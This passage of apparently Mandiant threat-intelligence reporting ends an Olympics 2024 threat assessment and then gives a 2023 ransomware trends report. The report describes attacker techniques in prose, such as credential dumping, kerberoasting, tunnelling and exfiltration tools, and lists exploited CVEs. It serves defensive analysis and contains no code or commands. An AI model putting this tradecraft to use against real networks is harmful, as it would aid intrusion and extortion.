• In February 2024 the French Foreign Ministry accused Russia of conducting widespread disinformation campaigns to disrupt the upcoming general election and the Olympics in retaliation for France’s support of Ukraine after Russia’s invasion in February 2022. 
• In April 2024 at the opening of an Olympic swimming venue, French President Emmanuel Macron accused Russia of conducting an online disinformation campaign undermining the safety and security of the upcoming games. Mandiant Intelligence has independently observed pro-Russia activity from campaigns that we track, which appears to be consistent with these claims. 

Several pro-Russia hacktivist groups have targeted entities throughout Europe and pose a viable threat to the Summer Olympics, including: Anonymous Sudan, Cyber Army of Russia Reborn, NoName057(16), UserSec, and Server Killers. We judge the threat from pro-Russia hacktivists to be particularly elevated because a number of these groups have publicized destructive attacks or data leaks from Russian state sponsored intrusion activity. Several groups have also demonstrated the ability to disrupt high profile targets with DDoS attacks.

Case Study: Doppelganger

Mandiant Intelligence has observed a network of inauthentic domains and social media accounts across multiple platforms, which we attributed to the pro-Russian information operations campaign publicly referred to as "Doppelganger". These domains have promoted political content in English, German, French, and Italian and circulated narratives aligned with Russian strategic interests, including those related to the Russian invasion of Ukraine. 

• Mandiant has observed some narratives targeting the upcoming 2024 Paris Olympics promoted by Doppelganger domains. This has included articles promoting narratives that generally implied that France was not prepared as a host, as well as those that appeared intended to frame the French Government as inadequately prepared for the security risks potentially surrounding the games—particularly those related to Islamic extremism (Figure 3).
• In March 2024 the U.S. Department of Treasury announced sanctions against two individuals and two organizations associated with a Russian information operations campaign which posed as European government entities and media outlets to distribute inauthentic, pro-Russian narratives to European audiences. This activity aligns with the coordinated inauthentic networks of threat activity used by the Doppelganger campaign.

Figure 5: Example of an Olympics-related article published by a Doppelganger affiliated domain

China

PRC information operations will likely leverage Olympic-themed narratives to promote pro-PRC and anti-Western ideologies. Additionally, we anticipate pro-PRC information operations campaigns will likely use the doping scandal surrounding the PRC’s swim team as part of their operations to highlight anti-PRC or pro-Western biases. 

There is precedent for pro-PRC campaigns commenting on past Olympics. 

• Rolling Stone highlighted a PRC-linked operation that masqueraded as a European news outlet "New Europe Observation" to foment discord in European populations using controversial topics such as immigration and the boycott of the Beijing Olympics in 2022. This operation attempted to hire "astroturf" protesters to participate in offline demonstrations and engaged native speakers of English, Russian, and other languages.
• In late 2021 and early 2022, Mandiant Intelligence identified social media accounts that we judge to be part of a pro-PRC information operations campaign dubbed “DRAGONBRIDGE” critiquing the U.S. decision to boycott the 2022 Winter Olympics in Beijing. 
• ProPublica highlighted how pro-PRC information operations leveraged bots to promote false narratives surrounding Beijing’s 2022 Olympic Winter Games. 

Belarus

Mandiant identified UNC1151 and Ghostwriter activity in December 2021 promoting the narrative that Lithuania would boycott the 2022 Beijing Winter Olympics. Lithuania remains a frequent target for Ghostwriter operations and this likely was an opportunity to cause internal unrest leveraging a topical event. 

Financially-Motivated Threat Activity

Mandiant Intelligence assesses with moderate confidence that financially motivated actors pose a moderate severity threat to the 2024 Summer Olympics. The amount of financial transactions conducted at the games will likely be an attractive target for malicious actors seeking profit with minimal effort. Cybercrime will likely be opportunistic in nature with the main risks including:

• Ransomware and extortion operations have a tendency to target organizations during high-pressure moments, including the hosting of major events. Listings from data leak sites over the last year indicate that France is the fifth most impacted country by ransomware and data theft extortion activity. We observed listings for French organizations posted most frequently on sites for LOCKBIT, 8BASE (aka PHOBOS), NOESCAPE, MEDUSA, and ALPHV. It is also possible that cybercriminal groups that have not been historically active in France will increase their targeting against Olympic-related entities in the runup and during the Games. 
• Ticket scams often capitalize on interest in major sporting events to sell counterfeit tickets via fake ticket websites. The popularity of the games, growing demand for tickets, and the large amount of financial transactions occurring on third-party ticket platforms could make these systems an attractive target for cybercriminals.
• Lure material is often tied to topics of interest within the general public, and we anticipate that threat actors will likely use the upcoming Olympics as lure material for the initial compromise stages of their campaigns. Lures can convince unsuspecting users to engage with malicious material resulting in the distribution of malware. 

Risk Mitigation Techniques 

Organizations should strongly consider taking proactive measures to reduce the risk of cyber threats associated with the Paris Olympics.

• Organizations involved in the Games should update their threat profile to account for potentially new threats to which they will be exposed. Intelligence on relevant threat actors can be used to inform detection efforts, insert proactive security controls, conduct threat hunting within a network, and inform cyber risk assessments linked to the Games. It may be helpful to review the following guides for countering DDoS and destructive attacks: 
  • Proactive Preparation and Hardening to Protect Against Destructive Attacks
  • Linux Endpoint Hardening to Protect Against Malware and Destructive Attacks
  • Distributed Denial of Service (DDoS) Protection Recommendations
• Organizations that face an elevated threat from ransomware and extortion operations are encouraged to read Mandiant Intelligence’s Ransomware Protection and Containment Strategies guide. This provides practical guidance for hardening and protecting infrastructure, identities, and endpoints. 
• Security awareness training should highlight the risks of Olympics-related social engineering lures in the runup to and during the Games. 
• Organizations and individuals traveling to the Games should consider travel-related cyber risks, such as the elevated risk of public Wi-Fi tampering, scams involving Olympics-related events, and the targeting of VIPs (i.e. government officials, senior decision makers, and business executives).
• Organizations that face an elevated threat of information operations in relation to the Olympics should consider potential brand damage risks and comms mitigation strategies. It may be helpful to review Mandiant’s blog post, How to Understand and Action Mandiant's Intelligence on Information Operations.

Figure 6: Mitigations for travel and close access threats

Outlook

Despite the variety of Olympics-related cyber threats, the security community is better prepared when compared to previous iterations of the Games. Having observed actors such as APT44 target previous Olympics, we have better insights into the ways the Games could be targeted. This gives defenders an opportunity to build a proactive and tailored security posture.

Written by: Bavi Sadayappan, Zach Riddle, Jordan Nuce, Joshua Shilko, Jeremy Kennelly

 

A version of this blog post was published to the Mandiant Advantage portal on April 18, 2024.

Executive Summary

• In 2023, Mandiant observed an increase in ransomware activity as compared to 2022, based on a significant rise in posts on data leak sites and a moderate increase in Mandiant-led ransomware investigations.
• Mandiant observed an increase in the proportion of new ransomware variants compared to new families, with around one third of new families observed in 2023 being variants of previously identified ransomware families. 
• Actors engaged in the post-compromise deployment of ransomware continue to predominately rely on commercially available and legitimate tools to facilitate their intrusion operations. Notably, we continue to observe a decline in the use of Cobalt Strike BEACON, and a corresponding increase in the use of legitimate remote access tools.
• In almost one third of incidents, ransomware was deployed within 48 hours of initial attacker access. Seventy-six percent (76%) of ransomware deployments took place outside of work hours, with the majority occurring in the early morning. 
• Mandiant's recommendations to assist in addressing the threat posed by ransomware are captured in our Ransomware Protection and Containment Strategies: Practical Guidance for Hardening and Protecting Infrastructure, Identities and Endpoints white paper.

Introduction

Threat actors have remained driven to conduct ransomware operations due to their profitability, particularly in comparison to other types of cyber crime. Mandiant observed an increase in ransomware activity in 2023 compared to 2022, including a 75% increase in posts on data leak sites (DLS), and an over 20% increase in Mandiant-led investigations involving ransomware from 2022 to 2023 (Figure 1). These observations are consistent with other reporting, which shows a record-breaking more than $1 billion USD paid to ransomware attackers in 2023. 

This illustrates that the slight dip in extortion activity observed in 2022 was an anomaly, potentially due to factors such as the invasion of Ukraine and the leaked CONTI chats. The current resurgence in extortion activity is likely driven by various factors, including the resettling of the cyber criminal ecosystem following a tumultuous year in 2022, new entrants, and new partnerships and ransomware service offerings by actors previously associated with prolific groups that had been disrupted.

This blog post provides an overview of the ransomware landscape and common tactics, techniques, and procedures (TTPs) directly observed by Mandiant in 2023 ransomware incidents. Our analysis of TTPs relies primarily on data from Mandiant incident response engagements and therefore represents only a sample of global ransomware intrusion activity. The majority of these incidents involved the post-compromise deployment of ransomware following network intrusion activity, with many incidents also involving data theft extortion. The impacted organizations were based across Africa, Asia Pacific, Europe, Latin America and the Caribbean, the Middle East, and North America, and within nearly every industry sector.

Read our Ransomware Protection and Containment Strategies paper for in-depth strategies to defend against ransomware.

Figure 1: Ransomware incident response investigations, 2018–2023

Ransomware Landscape in 2023

Ransomware remains a prominent threat to organizations across all sectors and geographical regions; victims on DLS spanned more than 110 countries in 2023. Ransomware-as-a-service (RaaS) offerings, both new and existing, lower the barrier to entry for threat actors interested in conducting these operations. The 75% increase in victims posted to tracked DLS compared to 2022 illustrates the continued interest in these operations. While the overall mechanics of RaaS operations have remained fairly consistent, some actors have tested new and unique methods to increase extortion pressure on victims and/or to obtain payments.

• In mid-2023, ALPHV operators created a website purportedly containing searchable victim data and released an application programming interface (API) for their DLS to potentially increase pressure on victims by making their data more easily accessible.
• In November 2023, in an apparent first, ALPHV/BlackCat-affiliated actors claimed that they filed a complaint with the U.S. Securities and Exchange Commission (SEC) against an alleged victim, MeridianLink, for failing to disclose a data breach stemming from a cyberattack that the gang itself conducted. 
• In 2023, there were multiple reports of ransomware actors targeting patients of impacted healthcare facilities to apply additional pressure on these organizations to pay ransom demands. These tactics included "swatting" patients and contacting patients threatening to leak personal data. 
• Several newer RaaS operations, such as Trigona and Kuiper, accept multiple cryptocurrencies, including Monero. For example, the Kuiper ransomware operators appear to prefer to be paid in Monero given the analyzed ransom notes indicate the ransom demand is increased 20% if victims pay in Bitcoin. The preference for being paid in Monero suggests actors are taking additional steps to obscure their activity. 

Data Leak Sites

2023 marked the year with the highest volume of posts on shaming sites since we began tracking these sites in Q1 2020, with Q3 2023 breaking the quarter record with more than 1,300 posts (Figure 2). Other indicators also support an increase in overall ransomware activity, including a 15% increase in unique sites with at least one post and an over 30% increase in new DLS in 2023 compared to 2022.

Approximately 30% of posts in 2023 were on newly identified DLS associated with various ransomware families, including ROYALLOCKER.BLACKSUIT, RHYSIDA, and REDBIKE (aka Akira). Notably, we identified limited overlaps with several of the top new DLS and tracked threat actors and/or previously observed ransomware families (Figure 3). It is plausible that at least some portion of the newly identified DLS activity is the result of previously established actors forming new alliances or rebrands rather than creating completely new offerings.

Figure 2: Data leak site victims, 2020–2023

Figure 3: New 2023 DLS with code reuse, actor overlaps, or rebrands

Figure 4: Number of unique data leak sites active each month

New Ransomware Families 

The proportion of new ransomware variants compared to new families has steadily increased, with around one third of new families observed in 2023 being variants of previously identified ransomware families (Figure 5). This could suggest that threat actors are using their time and resources to update pre-existing ransomware families rather than creating new families from scratch. Further, since 2021, we have observed an increase in the proportion of ransomware families and variants capable of encrypting Linux and ESXi systems compared to Windows, a trend that continued throughout 2023 (Figure 6). Approximately 70% of new subfamilies in 2023 were designed to target non-Windows systems when a Windows variant already existed, while around 11% of new subfamilies were the result of rebrands. Threat actors have likely continued to target non-Windows systems to increase their potential attack surface and maximize their impact as well as potential ransom demands.

Figure 5: Newly analyzed ransomware families (this does not reflect the entirety of the ransomware ecosystem)

Figure 6: Breakdown of ransomware supported operating system per year

Timing of Ransomware Deployment

While we have historically identified clear patterns in the most prominent day of the week for ransomware execution and a high volume of activity occurring outside of work hours, ransomware operators appeared to be less deliberate in their timing in 2023. About 75% of ransomware deployments appeared to occur outside of standard business hours, a slight reduction from 2021 and 2022, and ransomware execution was more evenly distributed across days of the week than in prior years (Figure 7).

Figure 7: Ransomware execution by hour of the day

Time Elapsed Between Initial Infection and Ransomware Deployment

The median time between initial access and ransomware deployment increased slightly from five days in 2022 to six days in 2023. In recent years, we have seen a significant reduction in the time between initial access and ransomware deployment. The median time elapsed during ransomware intrusions between 2017 and 2019 was 21 days, which decreased dramatically to just 3.5 days in 2020, before shifting upward to seven days 2021. Incidents that involve data theft extortion continue to take longer than incidents involving just ransomware deployment. In 2023, we observed approximately 59% of incidents involving confirmed or suspected data theft extortion compared to approximately 51% in 2022; this increase is likely reflected in the slight increase in median time in 2023 compared to 2022.

• In 2023, the number of days elapsed between the first evidence of malicious access and the deployment of ransomware varied widely, ranging from zero to 116 days (Figure 8).
• In approximately 15% of incidents, ransomware was deployed within one day of initial attacker access and almost one third of incidents involved ransomware execution within the first 48 hours of initial access. 
• In more than 77% of observed incidents, ransomware was deployed within the first 30 days of initial attacker interaction and 54% occurred within the first week.
• Approximately 59% of 2023 incidents involved confirmed or suspected data theft. The median time between initial access and ransomware deployment in incidents with confirmed or suspected data theft was 6.11 days, while the median time in incidents without data exfiltration was 1.76 days. 
  • 2022 incidents had a larger range between incidents with or without data exfiltration, with missions involving data theft having a median time of nine days compared to one day for those without data theft. This could suggest that threat actors are becoming more efficient when performing data theft.

Figure 8: Days elapsed between initial access and ransomware deployment

Commonly Observed TTPs

The following sections discuss trends in the TTPs used by threat actors distributing ransomware post-compromise, and they are organized into corresponding stages of Mandiant's attack lifecycle model (Figure 9). The TTPs outlined in this section were observed by Mandiant during ransomware investigations in 2023.

Figure 9: Attack lifecycle associated with ransomware incidents observed in 2023

Initial Access

The most common initial access vectors in 2023 involved stolen credentials or the exploitation of vulnerabilities in public-facing infrastructure (Figure 10). In numerous incidents, the first evidence of network compromise was an actor's authentication to the victim's virtual private network (VPN) either through possession of legitimate credentials or a successful brute-force attack. We also observed a slight increase in brute-force attacks in 2023 compared to 2022.

• In almost 40% of incidents where the initial access vector was identified, threat actors used compromised legitimate credentials to gain access to victim environments, either through the use of stolen credentials or brute-force attacks. The vast majority of these incidents involved authentication to a victim's corporate VPN infrastructure.
  • Approximately one fourth of analyzed incidents with a known initial infection vector involved the use of stolen credentials. It is plausible that, in some cases, threat actors are obtaining these credentials via underground forums given that we consistently observe threat actors selling credentials, including logs obtained from infostealers. Further, threat actors have expressed high interest in infostealers, which could be leveraged to obtain credentials. 
  • Around 14% of incidents involved the use of brute-force attacks, an increase from 8% of incidents in 2022. In several instances, a threat actor was able to successfully log in via an account with a simple or common password. 
• Vulnerability exploitation of publicly facing systems continues to be a common initial access vector, observed at a slightly increased rate in 2023 compared to 2022 (Table 2). Across analyzed incidents in 2023, threat actors exploited vulnerabilities for initial access in almost 30% of incidents, up from 24% in 2022, but significantly down from over 50% in 2021. Multiple incidents involving vulnerability exploitation for initial access had a total time-to-ransom value that was less than five minutes, suggestive of automated mass exploitation and ransomware deployment to vulnerable systems accessible via the internet.
  • Multiple threat actors exploited CVE-2023-4966 (aka CitrixBleed) to hijack legitimate Citrix NetScaler user sessions. Follow-on activity included deployment of various ransomware families, including AGENDA.RUST, ALPHV, and LOCKBIT.
  • In all observed incidents involving vulnerability exploitation, threat actors exploited known vulnerabilities where exploit or proof-of-concept (PoC) code was publicly available. In one instance, threat actors were suspected to have exploited a 2017 vulnerability in Liferay Portal.
  • While Mandiant did not directly observe any ransomware incidents where threat actors engaged in zero-day exploitation for initial access, public reporting indicated that at least three zero-day vulnerabilities (CVE-2023-28252, CVE-2023-20269, and CVE-2023-24880) were used in incidents involving the deployment of four different ransomware families. FIN11 also continued to exploit zero-day vulnerabilities in file transfer systems, but in operations involving data theft extortion without ransomware deployment. 
• In about 14% of incidents in which the initial access vector was identified, threat actors conducted email, SMS, or voice phishing.
  • QAKBOT campaigns were the initial access vector in multiple BASTA incidents. The QAKBOT payloads were distributed through email spam campaigns via different malicious payloads, including ZIP and OneNote files.
  • In 2023, UNC3944 used SMS phishing operations and social engineering to obtain credentials for initial access, including impersonating employees in phone calls to the victim organization's help desk as part of an attempt to reset passwords and multi-factor authentication (MFA) device configurations. 
• Threat actors also leveraged opportunistic web-based malware distribution to gain initial access to victim environments. 
  • UNC4696 leveraged malicious advertisements for popular software such as WinSCP and Advanced IP Scanner to trick victims into downloading a malicious installer, leading to BEACON or a Python-based backdoor. UNC4696 leveraged this access to ultimately deploy ALPHV.

During 2023, Mandiant also continued to observe threat actors leverage initial access that had been obtained from another threat actor to facilitate ransomware deployment. These initial compromises were typically performed via prominent malware distribution threat clusters. 

• Throughout 2023, we observed numerous UNC4393 BASTA ransomware operations that leveraged initial access obtained via UNC2500 and UNC2633 QAKBOT campaigns. However, following the August 2023 takedown of QAKBOT, we observed UNC2500 distributing DARKGATE in intrusions leading to UNC4393 BASTA ransomware operations.
• Other notable distribution threat clusters that were observed prior to ransomware deployment included UNC2565 distributing GOOTLOADER, UNC2824 distributing URSNIF, and UNC3525, which offers access to hosts infected with SMOKELOADER.

Figure 10: Initial intrusion vectors

Vector

Description

Brute Force

The threat actor gained access to the victim's environment via brute-force authentication.

Exploit

The threat actor exploited a vulnerability against an internet-facing server, which resulted in unauthorized access to the victim's environment.

Phishing

The threat actor gained access to the victim's environment by distributing malicious emails.

Server Compromise

The threat actor gained access to the victim environment via compromise of internet-facing servers. 

Stolen Credentials

The threat actor leveraged stolen credentials to gain access to the victim's environment.

Third Party

The threat actor gained access to the victim's environment by compromising a third party, such as a business partner, hosting provider, service provider, or other related organization.

Web Compromise

The threat actor used a web-based delivery mechanism, such as malicious advertisements, SEO poisoning, or watering hole attacks to access the victim's environment.

Table 1: Initial intrusion vector descriptions

Vendor

Product

CVE

Apache

ActiveMQ

CVE-2023-46604

Atlassian

Confluence

CVE-2023-22518

Citrix

NetScaler ADC

CVE-2023-4966

CVE-2023-3519 (suspected)

Fortinet

FortiOS

CVE-2022-40684

Liferay

Liferay

2017 Liferay vuln

ManageEngine

Service Desk

CVE-2022-47966

Microsoft

Exchange Server

CVE-2021-31207

CVE-2021-34473

CVE-2021-34523

Progress

WS_FTP Server

CVE-2023-40044

Veritas

Backup Exec Agent

CVE-2021-27876

CVE-2021-27877

CVE-2021-27878

VMware

vSphere Client

CVE-2021-21974

(suspected)

Horizon Unified Access Gateway

CVE-2021-45046

Table 2: Suspected/observed vulnerabilities leveraged for initial access in ransomware incidents Establish Foothold

Threat actors used a combination of legitimate remote access tools, attack frameworks, tunnelers, and valid credentials to establish footholds within victim environments.

• BEACON remained the most popular attack framework used by threat actors; it was used to establish a foothold in approximately 10% of ransomware engagements in 2023. Other exploitation frameworks, such as BOLDBADGER and METASPLOIT, were observed in a small subset of ransomware incidents. For example, in one LOCKBIT.BLACK intrusion, the actors established a foothold via BOLDBADGER.
• Threat actors consistently relied on remote management tools for multiple phases of the attack lifecycle, including to establish foothold, maintain presence, and data exfiltration. Commonly used remote management tools included ScreenConnect, Splashtop, Atera, and Anydesk. 
• Threat actors often used compromised RDP and VPN user credentials to establish a foothold. This is consistent with our observations of threat actors frequently using compromised credentials to gain initial access, as threat actors continued to leverage valid credentials to move around the network via Remote Desktop Protocol (RDP). We also observed threat actors creating new user accounts for this phase of the attack lifecycle. 
• UNC3944 modified MFA configurations in multiple incidents as a method to maintain presence. In one incident, they added new MFA devices to compromise accounts.
• We observed an increase in the usage of web shells for this phase of the attack lifecycle; however, many of these incidents stemmed from an UNC4721 campaign involving the exploitation of Atlassian vulnerabilities to deploy Java-based web shells, ultimately leading to CONTI ransomware. 
• Although not as common, some threat actors deployed backdoors, such as LIGHTDUTY, GOREVERSE, and BANKSHOT, in incidents leading to ransomware deployment.

Maintain Presence

Threat actors largely relied on legitimate remote access tools, BEACON, and a variety of tunneler and proxy malware to maintain presence in victim environments. In some cases, they also used built-in Windows persistence mechanisms, created new accounts, or changed passwords of pre-existing accounts. 

• Threat actors have seemingly continued to shift away from using BEACON to maintain presence. In 2023, only 14% of ransomware incidents involved BEACON usage during this phase, compared to 37% in 2022, and more than 50% in 2021. 
• We observed limited use of other post-exploitation C2 frameworks, such as METASPLOIT. For example, in one NOESCAPE incident, the threat actor registered a service for SLIVER.
  • In a CACTUS ransomware incident, threat actors used Metasploit and Meterpreter SSH reverse shells to external attacker-controlled infrastructure.
• Threat actors continue to show a proclivity for using legitimate remote access software to maintain presence, sometimes introducing multiple different remote access tools in the same environment (Table 3). We identified remote access utilities used to maintain presence in more than 35% of incidents.
• While less common, some threat actors continue to leverage custom backdoors and malware. For example, FIN8 has used a multi-stage shellcode infection chain leading to the TURBOSHOCK backdoor, which we believe may be exclusive to these threat actors.
• Threat actors leveraged SSH tunnels and reverse shells. For example, we observed multiple threat actors downloading the BitVise SSH client from the vendor website.
  • A threat actor who deployed CACTUS ran a batch file script that created a scheduled task to execute a reverse shell every 15 minutes.
  • In a LOCKBIT.BLACK intrusion, threat actors configured an SSH tunnel that enabled them to connect directly into the victim network. The actors ran batch scripts that created two scheduled tasks, which ran an OpenSSH server configured to listen on port 2222 and established the outbound SSH connection that forwarded access to port 2222.
• Threat actors relied on tunnelers to maintain presence in victim environments in approximately 18% of intrusions. SYSTEMBC was the most commonly used tunneler, with Cloudflared, RSOCX, and NGROK also used in multiple incidents. 
• In approximately 17% of incidents, threat actors used their access to create new user accounts—many of which had elevated privileges—to maintain their presence.
• Threat actors also used built-in Windows persistence mechanisms, such as scheduled tasks, service installations, and registry-based persistence, to persist a variety of malware and scripts. In some cases, the malware itself creates a scheduled task, like in the case of SYSTEMBC.V2 and SYSTEMBC.POWERSHELL.

Remote Access Tools

Fleetdeck

Pulseway

Level.io

ScreenConnect

Atera

Teamviewer

Anydesk

Splashtop

DWAgent/DWService

RustDesk

MeshAgent

eHorus

Parsec

LevelRMM

Table 3: Legitimate remote access tools used to maintain persistence

Escalate Privileges

Threat actors most often escalated privileges in victim environments by obtaining valid credentials, most frequently via MIMIKATZ, although they commonly employed multiple tools and/or tactics in a single intrusion. Other credential theft tools used by threat actors included CLEANBLUFF, LAZAGNE, NANODUMP, and a variety of publicly available tools and scripts. Threat actors also attempted privilege escalation through other methods, including vulnerability exploitation, DPAPI, and kerberoasting attacks.

• In numerous incidents, the threat actors leveraged MIMIKATZ, a Windows security audit tool that can be used to steal password hashes and dump plaintext passwords extracted from memory to obtain credentials with administrative privileges.
• Across multiple incidents, threat actors attempted to obtain credentials stored in memory by dumping lsass.exe (Local Security Authority Subsystem Service). In at least one case, we suspect that the threat actors leveraged NANODUMP, a credential theft utility that targets the Windows LSASS process for obtaining memory minidumps. Some threat actors also extracted the ntds.dit Active Directory database and various registry hives, including SAM, System, and Security, to obtain additional credentials.
• Threat actors leveraged various publicly available tools to access credentials via kerberoasting attacks. These tools have included PowerShell, RUBEUS, and the Invoke-Kerberoast PowerShell cmdlet. 
• Threat actors attempted to exploit vulnerabilities to escalate privileges in a variety of ransomware incidents. 
  • In an ALPHV ransomware intrusion, threat actors leveraged CLEANBLUFF, a privilege escalation tool that exploits a vulnerability in the Common Log File System driver component of Windows (CVE-2022-24521).
  • During another incident that involved LOCKBIT ransomware, the threat actors deployed a file that was capable of exploiting CVE-2022-24521 and/or CVE-2021-43226 for privilege escalation.
  • In a BASTA ransomware intrusion, we observed threat actors leverage CVE-2023-28252 to escalate privileges in a victim environment prior to deploying BEACON.
  • During an intrusion involving LOCKBIT.BLACK and LOCKBIT.UNIX ransomware deployment, there was evidence that the threat actors likely leveraged CVE-2023-3539 for privilege escalation.
  • In a WHITERABBIT ransomware intrusion, the threat actors leveraged CVE-2023-3519, which would likely have provided them with access to privileged credentials. 
• Threat actors commonly employed various publicly available tools to obtain valid credentials and/or login to additional accounts.
  • We observed threat actors using AGENDA.RUST, GLOBEIMPOSTER, MALLOX, MEDUSEALOCKER.V2, and PHOBOS leverage the open-source credential theft tool LAZAGNE.
  • Threat actors who later deployed ALPHV.LINUX, ALPHV.SPHYNX, RAGNARLOCKER, and STALEDONUT executed variations of the Veeam-Get-Creds.ps1 script, which is a publicly available script that attempts to recover passwords used by Veeam to connect to remote hosts. 
  • Threat actors using ALPHV.LINUX, ALPHV.SPHYNX, LOCKBIT, MEDUSALOCKER.V2, conducted brute-force attacks to access additional systems. For example, in a MEDUSALOCKER.V2 intrusion, the threat actor leveraged NLBRUTE, a Windows-based RDP brute-forcing tool that takes an input of target host addresses, usernames, and passwords.
  • In several ransomware-related intrusions, threat actors leveraged DONPAPI, a credential dumping utility written in Python that allows the gathering of credentials that are protected by DPAPI. 
  • In an incident involving LOCKBIT.V2 ransomware, the threat actors leveraged various credential harvesting tools that are publicly available, including LAZAGNE, MIMIKATZ, multiple tools that are available on the NirSoft website, gosecretsdump, and EFSPOTATO. 
• During an intrusion involving REDBIKE.LINUX ransomware, the threat actors used a domain join request to add an ESXi server to the victim domain so they could log in to the ESXi server with domain accounts.
• In an incident involving PLAYCRYPT ransomware deployment, the threat actors leveraged MIMIKATZ, attempted to dump LSASS via task manager, and recovered the ntds.dit Active Directory database from a volume shadow copy. They also used a more unique technique for privilege escalation, which involved the use of Internal Monologue to retrieve NTLM hashes and credentials.

Internal Reconnaissance

Threat actors frequently use built-in Windows utilities as well as publicly available and legitimate tools to facilitate internal reconnaissance activities during ransomware incidents. In several incidents, we observed threat actors searching internal resources, such as SharePoint drives, documentation, and emails for specific information that could support their operations.

• In approximately 50% of incidents, threat actors relied on publicly available network scanners to perform network reconnaissance in victim environments. Popular scanners included Advanced IP Scanner, Softperfect Network Scanner, and Advanced Port Scanner. 
  • In a MALLOX incident, threat actors used Softperfect Network Scanner, Advanced IP Scanner, IPConfig, and manually browsed files and folders on 12 endpoints.
• In some instances, we observed threat actors leverage web-based management interfaces in order to obtain information from a variety of different applications.
  • In a BLACKBYTE incident, threat actors used the vSphere web console to obtain information on various vSphere objects and traverse directories on a network share.
  • In a LOCKBIT incident, the threat actors used web-based management interfaces to gather information on multiple applications including Veeam backup software and multiple ESXi hosts.
  • UNC3944 used the Azure management interface to download a list of user and role assignments.
• In multiple incidents, threat actors performed targeted browsing of various internal systems, such as OneDrive and Sharepoint, looking for information related to passwords or internal infrastructure that could support other attack phases. 
  • In one instance, threat actors searched a victim's SharePoint for the word "ransomware." While the goal of this search is unclear, it is plausible that the actor was looking for ransomware protection mechanisms employed by the victim and/or cyber insurance/company policies dictating payment protocols in the event of a ransomware event.
  • In a ROYALLOCKER incident, the threat actor searched various internal resources including the Exchange public folders for a specific set of email addresses. They also performed a "Compliance Search"—normally used to support legal discovery (eDiscovery) requests—to target data from more than a dozen Exchange mailboxes.
• Consistent with previous years, threat actors frequently used both built-in Windows commands and PowerShell commands to gather information about victim infrastructure and hosts. Commonly observed Windows commands included whoami, net, nltest, ipconfig, and ping.
• Threat actors often deployed publicly available domain reconnaissance tools to perform a variety of tasks, including enumerating network shares, domain computers, and domain users. Popular tools included GHOSTCERT, SHARPSHARES (enumerates network shares), and SHARPHOUND (used to collect Active Directory information for BLOODHOUND). 
• In a PLAYCRYPT attack, the threat actors used AdFind and the Active Directory PowerShell module from RSAT to enumerate domain computers.
• In a limited number of intrusions, threat actors gathered information about NAS drives. For example, in an ALPHV intrusion, the threat actors downloaded and executed QNAP Qfinder Pro, a utility that provides easy access to view and manage files stored in a NAS. Separately, in a BABLOCK incident, threat actors accessed the victim's Synology NAS storage. These storage drives are likely an attractive target for ransomware operators as they could hold sensitive information for data theft extortion and/or be valuable targets for encryption. 

Lateral Movement

Lateral movement was most often accomplished using valid credentials from compromised accounts and/or attacker-created accounts in combination with built-in protocols, such as RDP, SSH, or SMB. Many incidents involved a combination of multiple commands, software, tools, and utilities for lateral movement. Threat actors leveraged some lateral movement methods less frequently compared to prior years; for example, the use of BEACON for lateral movement was seen in significantly fewer intrusions involving ransomware in comparison to 2022. 

• In various ransomware intrusions, threat actors relied heavily on Windows RDP and SMB protocols to move laterally across a network using valid and compromised credentials. In multiple incidents, threat actors enabled restricted admin mode for RDP; this enables actors with access to administrative privileges to bypass MFA when moving laterally within the victim environment.
• PsExec was commonly used to transfer and execute files across multiple intrusions. For example, in an incident involving ALPHV ransomware deployment, the threat actors used PsExec to run a batch script across multiple systems to enable RDP for lateral movement. In a separate incident, the threat actors used PsExec to deploy BEACON across multiple systems prior to ALPHV ransomware deployment.
• Throughout 2023, threat actors commonly leveraged SSH to move laterally in ransomware incidents, often to gain access to ESXi servers. In several intrusions, threat actors leveraged the open-source PuTTY utility to move laterally over SSH between victim systems. We also observed threat actors leveraging the Bitvise and MobaXterm SSH server/clients in incidents involving various ransomware families. 
• During several intrusions, threat actors leveraged Impacket's smbexec utility for lateral movement. For example, in one ALPHV ransomware intrusion, the threat actors used a modified version of Impacket's smbexec to create a new local admin account named "Admin" and added it to the local administrator's group on a different internal host. The actor then used RDP to leverage the new Admin account and access another system.
• Across multiple ransomware incidents, threat actors leveraged remote management software such as Splashtop and Screenconnect to access additional internal systems. 
• Threat actors also leveraged several tunneling tools to move laterally, including possible NGROK activity in an intrusion leading to ROYALLOCKER and RSOCX in another incident involving ALPHV.LINUX ransomware deployment. 
• In an incident leading to the deployment of ALPHV ransomware, the threat actors used the proxy malware SYSTEMBC.POWERSHELL for lateral movement. 

Complete Mission

Ransomware operators routinely conduct multifaceted extortion operations involving data theft as it gives them additional leverage in negotiating a successful ransomware payment. In the following subsections we highlight observations from both the data exfiltration and ransomware deployment phases of these operations. Based on Mandiant incident response engagements in 2023, in aggregate, ALPHV (ALPHV, ALPHV.LINUX, and ALPHV.SPHYNX) and LOCKBIT (LOCKBIT.BLACK, LOCKBIT.V2, and LOCKBIT.UNIX) were the most frequently observed ransomware families, followed by BASTA, REDBIKE, and PHOBOS (Figure 11). This is consistent with our 2022 observations in which ALPHV, LOCKBIT, and BASTA were the ransomware families most frequently observed, beaten out only by HIVELOCKER, which was disrupted in early 2023.

Figure 11: Distribution of ransomware families observed in 2023 incidents

Ransomware Families Observed in 2023 Incident Response Investigations

AGENDA.RUST

ALLEYCAT

ALPHV

ALPHV.LINUX

ALPHV.SPHYNX

BABLOCK

BABUK

BASTA

BEAMWAVE

BLACKBYTE

CACTUS

CONTI

CRYTOX

ESXIARGS

GLOBEIMPOSTER

GOODGAME

LOCKBIT

LOCKBIT.BLACK

LOCKBIT.UNIX

LOCKBIT.V2

LOKILOCKER

MALLOX

MEDUSALOCKER.V2

MONSTER

MORSEOP

NOESCAPE

PHOBOS

PLAYCRYPT

RAGNARLOCKER

REDBIKE

REDBIKE.LINUX

RHYSIDA

ROBBINHOOD

ROYALLOCKER

SNAKEBITE

SODINOKIBI.ESXI

STALEDONUT

STONELOCK

STOP

TRUECRYPT

VSOCIETY

WHITERABBIT

Table 4: Ransomware families observed in Mandiant's 2023 incident response investigations

Data Exfiltration

In ransomware incidents where data is known or suspected to have been stolen, threat actors have continued to use common strategies to identify, stage, and exfiltrate data. The most common approaches that we observed include the use of legitimate data synchronization tools such as Rclone and MEGASync, file compression using built-in tools or portable versions of WinRar or 7Zip, FTP clients such a FileZilla or WinSCP, and simple keyword searches to identify files to target for theft. 

